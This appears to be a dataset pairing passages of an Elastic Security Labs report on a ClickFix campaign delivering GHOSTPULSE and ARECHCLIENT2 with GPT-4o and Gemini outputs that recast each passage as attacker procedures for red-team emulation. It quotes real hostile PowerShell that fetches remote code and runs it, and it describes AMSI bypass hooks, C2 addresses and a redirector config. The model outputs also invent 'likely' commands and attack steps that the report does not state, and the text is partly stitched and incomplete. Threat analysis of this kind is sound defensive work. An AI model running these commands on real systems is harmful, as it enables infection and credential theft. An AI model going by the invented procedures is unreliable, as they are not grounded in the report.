LOADER4dc5ba5014628ad0c85f6e8903de4dd3b49fed65796978988df8c128ba7e7de9SHA-256 ARECHCLIENT2ReferencesThe following were referenced throughout the above research:https://x.com/SI_FalconTeam/status/1915790796948643929https://www.zscaler.com/blogs/security-research/analyzing-new-hijackloader-evasion-tactics

Original Text	ChatGPT 4o Paged
A Wretch Client: From ClickFix deception to information stealerdeployment — Elastic Security LabsSalim BitamPreambleElastic Security Labs has observed the ClickFix technique gaining popularity for multi-stage campaigns that deliver various malware throughsocial engineering tactics.Our threat intelligence indicates a substantial surge in activity leveraging ClickFix (technique first observed) as a primary initial access vector.This social engineering technique tricks users into copying and pasting malicious PowerShell that results in malware execution. Our telemetryhas tracked its use since last year, including instances leading to the deployment of new versions of the GHOSTPULSE loader. This led tocampaigns targeting a broad audience using malware and infostealers, such as LUMMA and ARECHCLIENT2, a family first observed in 2019but now experiencing a significant surge in popularity.This post examines a recent ClickFix campaign, providing an in-depth analysis of its components, the techniques employed, and the malwareit ultimately delivers.Key takeawaysClickFix: Remains a highly effective and prevalent initial access method.GHOSTPULSE: Continues to be widely used as a multi-stage payload loader, featuring ongoing development with new modules andimproved evasion techniques. Notably, its initial configuration is delivered within an encrypted file.ARECHCLIENT2 (SECTOPRAT): Has seen a considerable increase in malicious activity throughout 2025.The Initial Hook: Deconstructing ClickFix's Social EngineeringEvery successful multi-stage attack begins with a foothold, and in many recent campaigns, that initial step has been satisfied by ClickFix.ClickFix leverages human psychology, transforming seemingly innocuous user interactions into the very launchpad for compromise.	Model: gpt-4o Phase: Initial Access Technique: ClickFix Social Engineering Procedure: Users are deceived into copying and pasting malicious PowerShell commands, which results in malware execution. Phase: Execution Technique: PowerShell Execution Procedure: Likely use of PowerShell commands for executing payloads due to ClickFix. A probable command might involve bypassing execution policies: Command: `powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "<MaliciousCommand>"` Phase: Delivery Technique: Multi-Stage Payload with GHOSTPULSE Procedure: Deployment of the GHOSTPULSE loader, which serves as a multi-stage payload delivery system. Phase: Malware Deployment Technique: Deployment of Information Stealers Procedure: Following the execution, the GHOSTPULSE loader installs infostealers such as LUMMA and ARECHCLIENT2 to exfiltrate data. Phase: Evasion Technique: Encrypted Configuration Procedure: GHOSTPULSE uses an encrypted file to store its initial configuration, enhancing evasion from detection mechanisms.
Fake captchaAt its core, ClickFix is a social engineering technique designed to manipulate users into inadvertently executing malicious code on theirsystems. It preys on common online behaviors and psychological tendencies, presenting users with deceptive prompts – often disguised asbrowser updates, system errors, or even CAPTCHA verifications. The trick is simple yet incredibly effective: instead of a direct download, theuser is instructed to copy a seemingly harmless "fix" (which is a malicious PowerShell command) and paste it directly into their operatingsystem's run dialog. This seemingly voluntary action bypasses many traditional perimeter defenses, as the user initiates the process.ClickFix first emerged on the threat landscape in March 2024, but it has rapidly gained traction, exploding in prevalence throughout 2024and continuing its aggressive ascent into 2025. Its effectiveness lies in exploiting "verification fatigue" – the subconscious habit users developof mindlessly clicking through security checks. When confronted with a familiar-looking CAPTCHA or an urgent "fix it" button, many users,conditioned by routine, simply comply without scrutinizing the underlying request. This makes ClickFix an incredibly potent initial accessvector, favored by a broad spectrum of threat actors due to its high success rate in breaching initial defenses.Our recent Elastic Security research on EDDIESTEALER provides another concrete example of ClickFix's efficacy in facilitating malwaredeployment, further underscoring its versatility and widespread adoption in the threat landscape.Our internal telemetry at Elastic corroborates this trend, showing a significant volume in ClickFix-related alerts across our observedenvironments, particularly within Q1 2025. We've noted an increase in attempts compared to the previous quarter, with a predominant focuson the deployment of mass infection malware, such as RATs and InfoStealers.A ClickFix Campaign's Journey to ARECHCLIENT2The ClickFix technique often serves as the initial step in a larger, multi-stage attack. We've recently analyzed a campaign that clearly showsthis progression. This operation begins with a ClickFix lure, which tricks users into starting the infection process. After gaining initial access,the campaign deploys an updated version of the GHOSTPULSE Loader (also known as HIJACKLOADER, IDATLOADER). This loaderthen brings in an intermediate .NET loader. This additional stage is responsible for delivering the final payload: an ARECHCLIENT2(SECTOPRAT) sample, loaded directly into memory. This particular attack chain demonstrates how adversaries combine social engineeringwith hidden loader capabilities and multiple execution layers to steal data and gain remote control ultimately.	Model: gpt-4o Phase: Initial Access Technique: Social Engineering via ClickFix Procedure: User is tricked into copying and pasting a malicious PowerShell command into the operating system's run dialog. Phase: Execution Technique: PowerShell Execution Command (inferred): `powershell -ExecutionPolicy Bypass -NoProfile -Command "<malicious command>"` Phase: Delivery of Payload Technique: Process Injection with GHOSTPULSE Loader Procedure: After initial access, the GHOSTPULSE Loader is deployed to introduce an intermediate .NET loader. Phase: Payload Deployment Technique: Memory Injection Procedure: The intermediate .NET loader delivers the ARECHCLIENT2 (SECTOPRAT) sample, which is loaded directly into memory. Phase: Impact Technique: Remote Access and Data Exfiltration Procedure: The final payload allows adversaries to steal data and gain remote control of the system. This attack chain demonstrates the use of social engineering combined with multi-stage execution to effectively bypass defenses and execute malware.
Execution flowWe observed this exact campaign in our telemetry on , providing us with a direct look into its real-world execution and the sequence of itscomponents. Execution flow in KibanaTechnical analysis of the infectionThe infection chain begins with a phishing page that imitates a Cloudflare anti-DDoS Captcha verification.We observed two infrastructures (both resolving to 50.57.243[.]90) https://clients[.]dealeronlinemarketing[[.]]com/captcha/and https://clients[.]contology[.]com/captcha/ that deliver the same initial payload.User interaction on this page initiates execution. GHOSTPULSE serves as the malware loader in this campaign. Elastic Security Labs has beenclosely tracking this loader, and our previous research (2023 and2024) provided a detailed look into its initial capabilities. Fake captcha hosted by contology[.]comThe webpage is a heavily obfuscated JavaScript script that generates the HTML code and JavaScript, which copies a PowerShell command tothe clipboard.	Model: gpt-4o Phase: Initial Access Technique: Phishing Page with Fake Captcha Procedure: The attacker sets up a phishing page imitating a Cloudflare DDoS captcha page. User interaction with this page serves as the initial trigger for the attack. Phase: Execution Technique: PowerShell Execution via Clipboard Procedure: A heavily obfuscated JavaScript script on the phishing page generates HTML and JavaScript code that copies a PowerShell command to the user's clipboard. Likely Command (inferred): Command: `powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand <Base64 Payload>` Malware Loader Tool: GHOSTPULSE Technique: Malware Loading Procedure: GHOSTPULSE is used as the loader for the initial payload delivered through the phishing page. (Note: The report did not provide explicit details beyond the points mentioned, limiting inference without further data on specific command usage.)
Obfuscated JavaScript of the captcha pageInspecting the runtime HTML code in a browser, we can see the front end of the page, but not the script that is run after clicking on thecheckbox Verify you are human.HTML code of the captcha pageA simple solution is to run it in a debugger to retrieve the information during execution. The second JS code is obfuscated, but we can easilyidentify two interesting functions. The first function, runClickedCheckboxEffects, retrieves the public IP address of the machine byquerying https://api.ipify[.]org?format=json, then it sends the IP address to the attacker’s infrastructure, https://koonenmagaziner[.]click/counter/<IP_address>, to log the infection.JavaScript of the captcha pageThe second function copies a base64-encoded PowerShell command to the clipboard.	Model: gpt-4o Phase: Execution Technique: JavaScript Execution for Data Exfiltration Procedure: The function `runClickedCheckboxEffects` retrieves the public IP address by querying `https://api.ipify.org?format=json` and sends the IP to `https://koonenmagaziner.click/counter/<IP_address>` to log the infection. Phase: Execution Technique: Clipboard Data Injection Procedure: Copies a base64-encoded PowerShell command to the clipboard for potential execution by pasting it into a PowerShell terminal. Inferred Command (likely based on behavior described) Technique: PowerShell Execution via Clipboard Command (likely): `powershell -EncodedCommand <Base64 Payload>`
Command copied to the clipboard by the JavaScript scriptPowerShell command copied to the clipboardWhich is the following when it is base64 decoded(Invoke-webrequest -URI 'https://shorter[.]me/XOWyT' -UseBasicParsing).content \| iexWhen executed, it fetches the following PowerShell script:Invoke-WebRequest -Uri "https://bitly[.]cx/iddD" -OutFile "$env:TEMP\ComponentStyle.zip"; Expand-Archive -Path "$env:TEMP/ComponentStyle.zip" -DestinationPath "$env:TEMP"; & "$env:TEMP\crystall\Crysta_x86.exe"The observed infection process for this campaign involves GHOSTPULSE's deployment as follows: After the user executes the PowerShellcommand copied by ClickFix, the initial script fetches and runs additional commands. These PowerShell commands download a ZIP file(ComponentStyle.zip) from a remote location and then extract it into a temporary directory on the victim's system.Extracted contents include components for GHOSTPULSE, specifically a benign executable (Crysta_X64.exe) and a malicious dynamic-link library (DllXDownloadManager.dll). This setup utilizes DLL sideloading, a technique in which the legitimate executable loads themalicious DLL. The file (Heeschamjet.rc) is the IDAT file that contains the next stage's payloads in an encrypted formatand the file Shonomteak.bxi, which is encrypted and used by the loader to fetch the stage 2 and configuration structure. Content of ComponentStyle.zipGHOSTPULSEStage 1GHOSTPULSE is malware dating back to 2023. It has continuously received numerous updates, including a new way to store its encryptedpayload in an image by embedding the payload in the PNG’s pixels, as detailed in Elastic’s 2024 research blog post, and new modules fromZscaler research.The malware used in this campaign was shipped with an additional encrypted file named Shonomteak.bxi. During stage 1 of the loader, itdecrypts the file using a DWORD addition operation with a value stored in the file itself.	Model: gpt-4o Phase: Execution Technique: PowerShell Execution Command: `powershell (Invoke-webrequest -URI 'https://shorter[.]me/XOWyT' -UseBasicParsing).content \| iex` Phase: Execution Technique: Download and Execute via PowerShell Command: `powershell Invoke-WebRequest -Uri "https://bitly[.]cx/iddD" -OutFile "$env:TEMP\ComponentStyle.zip"; Expand-Archive -Path "$env:TEMP\ComponentStyle.zip" -DestinationPath "$env:TEMP"; & "$env:TEMP\crystall\Crysta_x86.exe"` Phase: Persistence (Via DLL Sideloading) Technique: DLL Sideloading Procedure: Utilize a benign executable (Crysta_X64.exe) to load a malicious DLL (DllXDownloadManager.dll). Phase: Execution (Stage 1) Technique: Decryption and Execution of Payload Procedure: Decrypt the file Shonomteak.bxi using a DWORD addition operation to reveal the next stage payload.
Decryption of Shonomteak.bxi fileThe malware then extracts the stage 2 code from the decrypted file Shonomteak.bxi and injects it into a loaded library using theLibraryLoadA function. The library name is stored in the same decrypted file; in our case, it is vssapi.dll.The stage 2 function is then called with a structure parameter containing the filename of the IDAT PNG file, the stage 2 configuration thatwas inside the decrypted Shonomteak.bxi, and a boolean field b_detect_process set to True in our case. Structure used in stage 2Stage 2When the boolean field b_detect_process is set to True, the malware executes a function that checks for a list of processes to see if they arerunning. If a process is detected, execution is delayed by 5 seconds. Delays execution by 5 secondsIn previous samples, we analyzed GHOSTPULSE, which had its configuration hardcoded directly in the binary. This sample, on the otherhand, has all the necessary information required for the malware to function properly, stored in Shonomteak.bxi, including:Hashes for the DLL names and Windows APIsIDAT tag: used to find the start of the encrypted data in the PNG fileIDAT string: Which is simply “IDAT”Hashes of processes to scan for API fetching hashes stored in GHOSTPULSE configuration rather than hardcodedFinal thoughts on GHOSTPULSEGHOSTPULSE has seen multiple updates. The use of the IDAT header method to store the encrypted payload, rather than the new methodwe discovered in 2024, which utilizes pixels to store the payload, may indicate that the builder of this family maintained both options forcompiling new samples.Our configuration extractor performs payload extraction using both methods and can be used for mass analysis on samples. You can find theupdated tool in our labs-releases repository.	Model: gpt-4o Phase: Initial Access Technique: Decryption of Payload Procedure: The malware decrypts the `Shonomteak.bxi` file to extract the stage 2 code. Phase: Execution Technique: DLL Injection Procedure: The malware injects the decrypted stage 2 code into a loaded library using the `LibraryLoadA` function with the name `vssapi.dll`, which is obtained from the decrypted file. Phase: Configuration Injection Technique: Parameterized Execution Procedure: The stage 2 function is executed with parameters including the IDAT PNG file's filename, stage 2 configuration, and a boolean field `b_detect_process` set to True. Phase: Defense Evasion Technique: Delayed Execution Procedure: If specific processes are detected running, the malware delays execution by 5 seconds to potentially evade behavior-based detection. Phase: Reconnaissance Technique: Process Enumeration Procedure: The malware scans for a list of processes using hashes stored in the `Shonomteak.bxi` configuration to determine if they are running. Phase: Payload Storage Technique: Obfuscation via Image Header Procedure: The malware uses the IDAT tag in a PNG file to locate the start of encrypted data, differing from previous methods that used pixel storage.
Payload extraction from the GHOSTPULSE sampleARECHCLIENT2In 2025, a notable increase in activity involving ARECHCLIENT2 (SectopRAT) was observed. This heavily obfuscated .NET remote accesstool, initially identified in November 2019 and known for its information-stealing features, is now being deployed by GHOSTPULSE throughthe Clickfix social engineering technique. Our prior research documented the initial deployment of GHOSTPULSE utilizing ARECHCLIENT2around 2023.The payload deployed by GHOSTPULSE in a newly created process is an x86 native .NET loader, which in its turn loads ARECHCLIENT2.The loader goes through 3 steps:Patching AMSIExtracting and decrypting the payloadLoading the CLR, then reflectively loading ARECHCLIENT2 Main entry of the .NET loaderInterestingly, its error handling for debugging purposes is still present, in the form of message boxes using the MessageBoxA API, forexample, when failing to find the .tls section, an error message box with the string "D1" is displayed. Debugging/error messages through a message boxThe following is a table of all the error messages and their description:Message DescriptionF1LoadLibraryExW hooking failedF2 AMSI patching failedD1 Unable to find .tls sectionW2 Failed to load CLRThe malware sets up a hook on the LoadLibraryExW API. This hook waits for amsi.dll to be loaded, then sets another hook onAmsiScanBuffer 0, effectively bypassing AMSI.	Model: gpt-4o Phase: Initial Access Technique: Social Engineering via Clickfix Technique Procedure: The attacker uses the Clickfix social engineering technique to distribute ARECHCLIENT2 (SectopRAT). Phase: Execution Technique: Reflective DLL Injection Procedure: The payload executed by GHOSTPULSE utilizes a .NET loader which: Patches AMSI: Sets a hook on the LoadLibraryExW API to wait for `amsi.dll`, then hooks `AmsiScanBuffer` for AMSI bypass. Extracts and Decrypts the Payload: Decrypts and prepares the main ARECHCLIENT2 payload for execution. Loads the CLR and Reflectively Loads ARECHCLIENT2: Uses the CLR to load the main RAT payload into memory. Phase: Defense Evasion Technique: AMSI Bypass Procedure: The .NET loader patches AMSI by setting hooks on the relevant APIs, bypassing malware scanning. Phase: Error Handling and Debugging Technique: Use of Native API for Error Messaging Procedure: Utilizes MessageBoxA API to display error messages for debugging, such as "F1" for LoadLibraryExW hooking failure and "F2" for AMSI patching failure.
Hooking LoadLibraryExWAfter this, the loader fetches the pointer in memory to the .tls section by parsing the PE headers. The first 0x40 bytes of this section serve asthe XOR key, and the rest of the bytes contain the encrypted ARECHCLIENT2 sample, which the loader then decrypts. Payload decryption routineFinally, it loads the .NET Common Language Runtime (CLR) in memory with CLRCreateInstance Windows API before reflectively loadingARECHCLIENT2. The following is an example of how it is performed.ARECHCLIENT2 is a potent remote access trojan and infostealer, designed to target a broad spectrum of sensitive user data and systeminformation. The malware's core objectives primarily focus on:Credential and Financial Theft: ARECHCLIENT2 explicitly targets cryptocurrency wallets, browser-saved passwords, cookies, andautofill data. It also aims for credentials from FTP, VPN, Telegram, Discord, and Steam. DNSPY view of the StealerSettingConfigParce classSystem Profiling and Reconnaissance: ARECHCLIENT2 gathers extensive system details, including the operating system version,hardware information, IP address, machine name, and geolocation (city, country, and time zone).	Model: gpt-4o Phase: Execution Technique: Reflective DLL Injection Procedure: The loader hooks `LoadLibraryExW` to intercept library loading, decrypts the ARECHCLIENT2 payload from the .tls section using a custom XOR routine, and then loads it into memory. The loader leverages the `CLRCreateInstance` Windows API to load the .NET Common Language Runtime (CLR) before executing ARECHCLIENT2. Phase: Credential Access Technique: Credential Dumping Procedure: ARECHCLIENT2 targets credential stores including cryptocurrency wallets, browser-saved passwords, autofill data, and specific applications like FTP, VPN, Telegram, Discord, and Steam. Phase: Discovery Technique: System Information Discovery Procedure: ARECHCLIENT2 collects system details such as operating system version, hardware information, machine name, IP address, and geolocation data. Note: Specific command-line syntax was not provided in the report; inferred procedures are based on described behavior and common attack methodology.
We've identified that both entities are linked to a digital advertising agency with a long operational history. Further investigation reveals thatthe company has consistently utilized client subdomains to host various content, including PDFs and forms, for advertising purposes.We assess that the attacker has likely compromised the server 50.57.243[.]90 and is leveraging it by exploiting the company's existinginfrastructure and advertising reach to facilitate widespread malicious activity.Further down the attack chain, analysis of the ARECHCLIENT2 C2 IPs (143.110.230[.]167 and 144.172.97[.]2) revealed additionalcampaign infrastructure. Both servers are hosted on different autonomous systems, AS14061 and AS14956.Pivoting on a shared banner hash (@ValidinLLC’s HOST-BANNER_0_HASH, which is the hash value of the web server response banners)revealed 120 unique servers across a range of autonomous systems over the last seven months. Of these 120, 19 have been previously labeledby various other vendors as “Sectop RAT” (aka ARECHCLIENT2) as documented in the maltrail repo.	Model: gpt-4o Based on the provided information, the report lacks specific command lines or explicit procedures. However, we can infer some likely techniques used by the threat actor. Here’s how the attack might have been conducted, structured in phases: Phase: Initial Access Technique: Server Exploitation Procedure: The attacker likely exploited vulnerabilities in the company’s server infrastructure, specifically targeting subdomains used for hosting PDFs and forms. Phase: Command and Control Technique: Remote Access Trojan (Sectop RAT) Procedure: Use of "Sectop RAT" to maintain persistent access and control over compromised systems. Phase: Attack Infrastructure Setup Technique: Distributed Infrastructure Procedure: Utilization of multiple servers within different autonomous systems to manage separate components of the campaign and evade detection. Additional Considerations: Continuation of malicious activity by leveraging compromised infrastructure for phishing, data exfiltration, or further propagation. Likely use of obfuscation and encryption techniques to hide communication between the compromised systems and the C2 servers. To create specific emulation commands for a red team, more detailed information on the attacker’s TTPs would be needed. This could include examining specific vulnerabilities exploited, RAT functionalities, and precise methods of server communication.
DNSPY view of ScanResult classCommand Execution: ARECHCLIENT2 receives and executes commands from its command-and-control (C2) server, granting attackersremote control over infected systems.The ARECHCLIENT2 malware connects to its C2 144.172.97[.]2, which is hardcoded in the binary as an encrypted string, and alsoretrieves its secondary C2 (143.110.230[.]167) IP from a hardcoded pastebin link https://pastebin[.]com/raw/Wg8DHh2x. ARECHCLIENT2 configuration from DNSPYInfrastructure analysisThe malicious captcha page was hosted under two domains clients.dealeronlinemarketing[.]com and clients.contology[.]comunder the URI /captcha and /Client pointing to the following IP address 50.57.243[.]90.	Model: gpt-4o Phase: Command and Control Technique: Remote Command Execution via Malware Procedure: ARECHCLIENT2 receives commands from a C2 server, facilitating remote control over infected systems. The malware connects to its primary and secondary C2 servers. Phase: Infrastructure Analysis Technique: Malicious Domain Hosting Procedure: The attacker hosts a malicious captcha under domains with specific URIs pointing to an IP used for infrastructure setup. Note: The details on exact command-line executions are not provided, but understanding the malware's capability to execute commands remotely on receiving instructions from C2 is crucial for emulation.
ARECHCLIENT2 C2 Server Profile, courtesy @censysioThe service on port 9000 has Windows server headers, whereas the SSH and NGINX HTTP services both specify Ubuntu as the operatingsystem. This suggests a reverse proxy of the C2 to protect the actual C2team server by maintaining disposable front-end redirectors.ARECHCLIENT2 IOC:HOST-BANNER_0_HASH: 82cddf3a9bff315d8fc708e5f5f85f20This is an active campaign, and this infrastructure is being built and torn down at a high cadence over the last seven months. As ofpublication, the following C2 nodes are still active:Value First Seen Last Seen66.63.187.222025-06-15 2025-06-1545.94.47.1642025-06-02 2025-06-1584.200.17.1292025-06-04 2025-06-1582.117.255.2252025-03-14 2025-06-1545.77.154.1152025-06-05 2025-06-15144.172.94.1202025-05-20 2025-06-1579.124.62.102025-05-15 2025-06-1582.117.242.1782025-03-14 2025-06-15195.82.147.1322025-04-10 2025-06-1562.60.247.1542025-05-18 2025-06-1591.199.163.742025-04-03 2025-06-15172.86.72.812025-03-13 2025-06-15107.189.24.672025-06-02 2025-06-15143.110.230.1672025-06-08 2025-06-15185.156.72.802025-05-15 2025-06-1585.158.110.1792025-05-11 2025-06-15144.172.101.2282025-05-13 2025-06-15192.124.178.2442025-06-01 2025-06-15107.189.18.562025-04-27 2025-06-15194.87.29.622025-05-18 2025-06-15185.156.72.632025-06-12 2025-06-12193.149.176.312025-06-08 2025-06-12	Model: gpt-4o The provided report focuses on the infrastructure setup of a C2 server, specifically highlighting a reverse proxy configuration. Unfortunately, the text lacks explicit command lines or procedures related to how attackers might operationalize this infrastructure. However, I can infer some possible tactics based on common practices: Phase: Infrastructure Setup Technique: Reverse Proxy Configuration Procedure: The attacker configures a reverse proxy using NGINX on Ubuntu systems to mask the real C2 server. Traffic directed to a Windows server on port 9000 is forwarded to disposable front-end redirectors. This setup protects the actual C2 server infrastructure and allows for rapid changes by maintaining active nodes. Phase: Operational Resilience Technique: Dynamic Infrastructure Management Procedure: The attacker frequently builds and tears down nodes to evade detection and maintain operational security. This involves scripting or automation tools to quickly spin up new instances and deploy configurations repetitively. For a red team to emulate such behavior, they could utilize: - Command for Reverse Proxy (NGINX Example): `bash server { listen 80; location / { proxy_pass http://<actual-C2-IP>:9000; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; } }` - Infrastructure Automation (Terraform/Ansible): - Set up scripts to rapidly deploy and destroy cloud instances. - Automate configuration of servers to quickly establish reverse proxy settings. Any more detailed TTPs would require additional context or example commands from the report.
ARECHCLIENT2 Host Banner Hash Pivot, courtesy @ValidinLLCPerforming focused validations of the latest occurrences (first occurrence after June 1, 2025) against VirusTotal shows community membershave previously labeled all 13 as Sectop RAT C2.All these servers have similar configurations:Running Canonical LinuxSSH on 22Unknown TCP on 443Nginx HTTP on 8080, andHTTP on 9000 (C2 port)	Model: gpt-4o Phase: Initial Access Technique: Exploit Public-Facing Application Procedure: The threat actor leverages vulnerabilities in publicly exposed services on Linux servers to gain access. Likely targeting SSH or HTTP services. Phase: Execution Technique: Remote Code Execution via SSH Procedure: The attacker likely uses SSH to execute commands remotely on the compromised Linux servers. Phase: Persistence Technique: Backdoor Installation Procedure: Installation of Sectop RAT on compromised systems to maintain persistent access. Configured to run on HTTP port 9000. Phase: Command and Control Technique: Custom C2 Communication Configuration: The Sectop RAT communicates with C2 over HTTP on port 9000. Procedure: The RAT uses HTTP requests to the C2 server to receive further instructions. Phase: Defense Evasion Technique: Use of Standard Application Layer Protocols Procedure: The threat actor uses standard HTTP and encrypted SSH communications to blend in with normal traffic and evade detection. Note: Specific command lines or scripts were not detailed in the report, so likely procedures were inferred based on typical attack patterns and reported behaviors.
Value First Seen Last Seen45.141.87.2492025-06-12 2025-06-12176.126.163.562025-05-06 2025-06-12185.156.72.712025-05-15 2025-06-1291.184.242.372025-05-15 2025-06-1245.141.86.1592025-05-15 2025-06-1267.220.72.1242025-06-05 2025-06-1245.118.248.292025-01-28 2025-06-12172.105.148.2332025-06-03 2025-06-10194.26.27.102025-05-06 2025-06-1045.141.87.2122025-06-08 2025-06-0845.141.86.1492025-05-15 2025-06-08172.235.190.1762025-06-08 2025-06-0845.141.86.822024-12-13 2025-06-0845.141.87.72025-05-13 2025-06-06185.125.50.1402025-04-06 2025-06-03ConclusionThis multi-stage cyber campaign effectively leverages ClickFix social engineering for initial access, deploying the GHOSTPULSE loader todeliver an intermediate .NET loader, ultimately culminating in the memory-resident ARECHCLIENT2 payload. This layered attack chaingathers extensive credentials, financial, and system data, while also granting attackers remote control capabilities over compromisedmachines.MITRE ATT&CKElastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats useagainst enterprise networks.TacticsTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.Initial AccessExecutionDefense EvasionCommand and ControlCollectionTechniquesTechniques represent how an adversary achieves a tactical goal by performing an action.PhishingSpearphishing LinkUser ExecutionMalicious LinkMalicious FileCommand and Scripting InterpreterPowerShellDeobfuscation/DecodingDLL Sideloading	Model: gpt-4o Phase: Initial Access Technique: Phishing via Malicious Link Procedure: The attacker uses ClickFix social engineering to lure victims into clicking on a malicious link within a phishing email. Phase: Execution Technique: User Execution of Malicious File Procedure: After clicking the malicious link, a file is delivered which the user executes, initiating the attack chain. Technique: Command and Scripting Interpreter - PowerShell Command: Likely PowerShell execution using techniques such as `powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden <Commands>` Phase: Defense Evasion Technique: Deobfuscation/Decoding Procedure: The attack utilizes obfuscated scripts or encoding to evade defenses. Technique: DLL Sideloading Procedure: Exploiting legitimate applications to load a malicious DLL file. Phase: Persistence Technique: GHOSTPULSE Loader Deployment Procedure: Deploys the GHOSTPULSE loader to maintain a foothold in the system. Phase: Execution (Continued) Technique: .NET Loader Execution Procedure: The GHOSTPULSE loader executes an intermediate .NET loader. Phase: Command and Control Technique: Memory-Resident Payload Procedure: Deployment of the ARECHCLIENT2 payload, which resides in memory to evade detection. Phase: Collection Technique: Credential Gathering Procedure: Gathers extensive credentials, financial, and system data from compromised machines. Phase: Impact Technique: Remote Control Procedure: Provides attackers with remote control capabilities over the compromised system.
Reflective LoadingUser InteractionIngress Tool TransferSystem Information DiscoveryProcess DiscoverySteal Web Session CookieDetecting [malware]DetectionElastic Defend detects this threat with the following behavior protection rules:Suspicious Command Shell Execution via Windows RunDNS Query to Suspicious Top Level DomainLibrary Load of a File Written by a Signed Binary ProxyConnection to WebService by a Signed Binary ProxyPotential Browser Information DiscoveryYARAWindows_Trojan_GhostPulseWindows_Trojan_Arechclient2ObservationsThe following observables were discussed in this research.Observable Type Name Referenceclients.dealeronlinemarketing[.]comdomain Captcha subdomainclients.contology[.]comdomain Captcha subdomainkoonenmagaziner[.]clickdomain50.57.243[.]90ipv4-addrclients.dealeronlinemarketing[.]com& clients.contology[.]com IPaddress144.172.97[.]2ipv4-addrARECHCLIENT2 C&C server143.110.230[.]167ipv4-addrARECHCLIENT2 C&C serverpastebin[.]com/raw/Wg8DHh2xipv4-addrContains ARECHCLIENT2 C&Cserver IP2ec47cbe6d03e6bdcccc63c936d1c8310c261755ae5485295fecac4836d7e56aSHA-256DivXDownloadManager.dllGHOSTPULSEa8ba1e14249cdd9d806ef2d56bedd5fb09de920b6f78082d1af3634f4c136b90SHA-256Heeschamjiet.rcPNG GHOSTPULSEf92b491d63bb77ed3b4c7741c8c15bdb7c44409f1f850c08dce170f5c8712d55SHA-256 DOTNET LOADER4dc5ba5014628ad0c85f6e8903de4dd3b49fed65796978988df8c128ba7e7de9SHA-256 ARECHCLIENT2ReferencesThe following were referenced throughout the above research:https://x.com/SI_FalconTeam/status/1915790796948643929https://www.zscaler.com/blogs/security-research/analyzing-new-hijackloader-evasion-tactics	Model: gpt-4o Phase: Execution Technique: Reflective DLL Injection Procedure: Threat actor likely utilized reflective loading to inject malicious DLLs into memory without touching disk. Phase: Defense Evasion Technique: User Interaction for Execution Procedure: Social engineering techniques to trick users into executing malicious payloads or enabling macros. Phase: Initial Access Technique: Ingress Tool Transfer Procedure: Tools and payloads transferred to the target environment, possibly using obfuscated methods. Phase: Discovery Technique: System Information Discovery Procedure: Commands executed to gather system information, such as OS version and architecture. Technique: Process Discovery Procedure: Enumerating running processes to identify potential targets for exploitation. Phase: Credential Access Technique: Steal Web Session Cookie Procedure: Threat actor may have used scripts or malware to extract web session cookies from browsers. Phase: Impact Technique: Detecting Malware Procedure: Utilized YARA rules and behavioral detection to identify suspicious activities such as: Suspicious Command Shell Execution via Windows Run. DNS Query to Suspicious Top Level Domain. Library Load of a File Written by a Signed Binary Proxy. Connection to WebService by a Signed Binary Proxy. Potential Browser Information Discovery for sensitive data extraction. By understanding and emulating these techniques, a red team can simulate similar attack scenarios for testing and improving organizational defenses.

Gemini 2.0

Gemini 2.0
Model: gemini-2.0-flash ``` Phase: Initial Access Technique: ClickFix Social Engineering Procedure: The attacker tricks users into copying and pasting malicious PowerShell commands into the operating system's run dialog. Phase: Execution Technique: PowerShell Execution Command: `powershell -ep bypass -enc <Base64 Payload>` Phase: Payload Deployment Technique: Download and Extract Command: `Invoke-WebRequest -Uri <URL> -OutFile $env:TEMP\ComponentStyle.zip` Command: `Expand-Archive -Path $env:TEMP\ComponentStyle.zip -DestinationPath $env:TEMP` Phase: Execution Technique: DLL Sideloading Procedure: Execute a benign executable, Crysta_X64.exe, which then loads a malicious DLL, D11XDownloadManager.dll. Command: `& $env:TEMP\crystall\Crysta_x86.exe` Phase: AMSI Bypass Technique: LoadLibraryExW Hooking & AmsiScanBuffer Hooking Procedure: Hooking the LoadLibraryExW API, waiting for amsi.dll to load, and then setting a hook on AmsiScanBuffer, bypassing AMSI. Phase: Reflective Loading Technique: Reflective .NET Loading via CLRCreateInstance and CLR Procedure: Loading the .NET Common Language Runtime (CLR) in memory before reflectively loading ARECHCLIENT2 Phase: Data Exfiltration & Remote Control Technique: Command & Control (C2) Procedure: ARECHCLIENT2 malware connects to a C2 server to receive and execute commands, granting remote control over infected systems. ```

Model: gemini-2.0-flash

```

Phase: Initial Access

Technique: ClickFix Social Engineering
Procedure: The attacker tricks users into copying and pasting malicious PowerShell commands into the operating system's run dialog.

Phase: Execution

Technique: PowerShell Execution
Command: powershell -ep bypass -enc <Base64 Payload>

Phase: Payload Deployment

Technique: Download and Extract
Command: Invoke-WebRequest -Uri <URL> -OutFile $env:TEMP\ComponentStyle.zip
Command: Expand-Archive -Path $env:TEMP\ComponentStyle.zip -DestinationPath $env:TEMP

Phase: Execution

Technique: DLL Sideloading
Procedure: Execute a benign executable, Crysta_X64.exe, which then loads a malicious DLL, D11XDownloadManager.dll.
Command: & $env:TEMP\crystall\Crysta_x86.exe

Phase: AMSI Bypass

Technique: LoadLibraryExW Hooking & AmsiScanBuffer Hooking
Procedure: Hooking the LoadLibraryExW API, waiting for amsi.dll to load, and then setting a hook on AmsiScanBuffer, bypassing AMSI.

Phase: Reflective Loading

Technique: Reflective .NET Loading via CLRCreateInstance and CLR
Procedure: Loading the .NET Common Language Runtime (CLR) in memory before reflectively loading ARECHCLIENT2

Phase: Data Exfiltration & Remote Control

Technique: Command & Control (C2)
Procedure: ARECHCLIENT2 malware connects to a C2 server to receive and execute commands, granting remote control over infected systems. ```

Gemini 2.5

Gemini 2.5
